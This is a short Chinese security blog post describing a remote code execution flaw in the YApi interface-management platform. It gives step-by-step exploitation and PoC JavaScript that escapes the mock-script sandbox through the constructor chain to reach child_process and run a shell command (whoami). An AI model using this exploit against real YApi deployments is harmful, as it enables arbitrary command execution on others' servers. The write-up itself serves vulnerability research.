YApi RCE

admin 2021年11月30日19:59:08安全博客YApi RCE已关闭评论47 views747字阅读2分29秒阅读模式

YAPI简介

  • YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI旨在为开发、产品和测试人员提供更优雅的接口管理服务,可以帮助开发者轻松创建、发布和维护不同项目,不同平台的API。有了YAPI,我们可以很方便的测试、管理和维护多个项目的API接口,不像Swagger那样是随应用生和灭的(且线上环境下大多数须关闭),YAPI是一个独立的服务平台。

自行搭建环境

漏洞利用

创建用户

  • 我们需要新建一个用户,并登录系统

添加一个项目

添加接口

高级mock处输入脚本和命令并开启

POC代码

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami").toString()

点击预览的地址即可命令执行的结果

相关推荐: BugPoC XSS 挑战 Writeup

译文来源:https://www.secjuice.com/bugpoc-xss-challenge-writeup/。受个人知识所限及偏见影响,部分内容或存在过度误解曲解,望师傅们包含并提出建议,感谢。 wacky.buggywebsite.com是一款能够…

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月30日19:59:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  YApi RCE http://cn-sec.com/archives/654977.html